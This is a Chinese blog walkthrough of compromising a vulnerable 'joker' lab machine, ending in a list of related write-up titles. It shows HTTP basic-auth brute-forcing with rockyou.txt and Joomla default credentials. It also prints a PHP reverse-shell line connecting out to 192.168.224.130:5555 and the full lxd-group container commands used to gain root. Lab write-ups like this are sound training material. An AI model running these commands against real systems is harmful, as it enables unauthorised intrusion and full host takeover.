vulhub靶机joker渗透
先设置为NAT模式
主机发现
Masscan快速扫描端口
服务扫描
访问8080端口,需要用户名和密码来登录
抓包,发现是base64加密,类似于tomcat的用户名和密码格式
放到intruder模块,爆破
第二个字典选择kali 里面/usr/share/wordlists/rockyou.txt 这是一个具有14万的字典
爆破得到用户名和密码
登录进来
发现是joomla搭建的,直接登后台,默认用户名和密码,joomla,joomla
进来找到index.php
写入反弹shell
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.224.130/5555 0>&1'");
?>
点击TemplatePreview预览index.php
端口监听,成功
看到lxd组,可以通过lxd容器提权
想要提升为root权限,我们需要给靶机挂载一个lxd镜像。可以在kali或者自己的服务器上从github下载build-alpine文件,然后执行build-alpine这个shell脚本。“build-alpine”,将以压缩文件的形式构建最新的Alpine镜像,最后我们需要在靶机中下载这个镜像。
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
生成一个tar.gz文件
切换到tmp目录下
wget http://192.168.224.130:80/alpine-v3.13-x86_64-20210218_0139.tar.gz
挂载镜像,同时取名为joker
lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias joker
Lxc image list
依次运行命令
lxc init joker ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
提权成功,进入容器之后,定位到/mnt/root即可查看目标主机资源
总结:知道了新的爆破字典rockyou.txt拥有14万条口令,对于joomla有了更深理解,学会了新的提权方式,lxd提权
vulhub靶机joker渗透相关推荐
- [渗透测试][Kali]对DC-2靶机进行渗透测试
对DC-2靶机进行渗透测试 1.搭建渗透平台 2.准备工作 3.扫描端口 4.使用wpscan进一步扫描 5.破解密码 6.登陆ssh 7.root权限提升 1.搭建渗透平台 Kali 2018, D ...
- Mission-Pumpkin v1.0: PumpkinGarden(南瓜花园)靶机的渗透测试
描述 Mission-Pumpkin v1.0是初学者级别的CTF系列.该CTF系列适用于对黑客工具和技术具有基本知识,但又难以应用已知工具的人们.南瓜花园是Mission-Pumpkin v1.0下 ...
- Vulnhub靶机:DC-7渗透详细过程
DC-7 前言提要 这个靶机有用到社工~,还是蛮有趣的 靶场地址:https://www.vulnhub.com/entry/dc-7,356/ DC-7是一个中级的靶场,需要具备以下前置知识: 基础 ...
- vulnhub靶机Tr0ll1渗透笔记
Tr0ll:1渗透笔记 靶场下载地址:https://www.vulnhub.com/entry/tr0ll-1,100/ kali ip:192.168.20.128 靶机和kali位于同一网段 信 ...
- Vulnhub靶机Wakanda渗透测试攻略
前言 Wakanda是一个新的交易市场网站,很快会上线了.你的目标是通过黑客技术找到"振金"的确切位置. 页首配图 本vulnhub靶机环境由xMagass开发,并托管于Vulnh ...
- DC-6靶机测试渗透详细教程
1.首先扫描我们要渗透机器的IP 2. 接着我们扫描IP的端口和操作系统 我们扫到目标机的80端口开启了,我们进行查看目标机的80端口.(我做过实验,所以不可以直接访问)因此我们需要进行给靶机的IP和 ...
- centos7搭建vulhub靶机教程
一.搭建靶场 1.安装docker yum -y install docker 出现完毕(complete)则表示安装完成 2.启动docker服务 systemctl start docker 报错 ...
- Vulnhub靶机Five86-2渗透笔记
文章目录 1.环境搭建 2.信息收集 2.1 主机发现 2.2 端口扫描 2.3 访问80端口(http服务) 2.4 目录爆破 3.漏洞利用 3.1 查找有关WordPress 5.1.4版本的漏洞 ...
- Vulnhub靶机DC-3渗透
靶机介绍 官方下载地址:https://www.vulnhub.com/entry/dc-32,312/ 靶机介绍,没有像DC-1和DC-2说是一共有几个flag 运行环境: 靶机:网络连接方式设为桥 ...
最新文章
- 2018-4-8蚁群算法---包子阳《智能优化算法以及Matlab实现》第五章
- #x开头的是什么编码呢。浏览器可以解释它。如中国等同与中文中国?
- #51CTO学院四周年# 成长路上的我和你
- [bzoj 1954]Pku3764 The xor-longest Path
- android组件启动,Android四大组件Service之StartService启动
- 表单如何添加大的文本框_在 Flutter 中进行文本框的创建和设定
- leetcode 678. Valid Parenthesis String | 678. 有效的括号字符串(带缓存的暴力递归)
- poj 3026 Borg Maze (最小生成树+bfs)
- C语言判断点是否在矩阵内
- 使用嵌套循环,打印 5 行 5 列的直角三角形
- java数据存在ie中_[Java教程]解决在IE中获取数据的缓存问题,运行环境为node.js
- react 返回一个页面_react-router-dom 怎么让第二个页面返回到第一个页面使得第一个页面不重新加载...
- docker pull下载很慢_假如服务器上没有 Docker 环境,你还能愉快的拉取容器镜像吗?...
- Cartopy绘图入门指南
- 青客公寓挂牌房源分城市爬取
- 我的世界空岛生存服务器制作,《我的世界》空岛生存地图玩法 教你如何安全度过前期生存下去...
- 正则表达式高级学习技巧
- python+selenium环境配置及浏览器调用
- 基于单片机干湿垃圾自动分类系统-毕设课设资料
- [简化] [排除] [推理]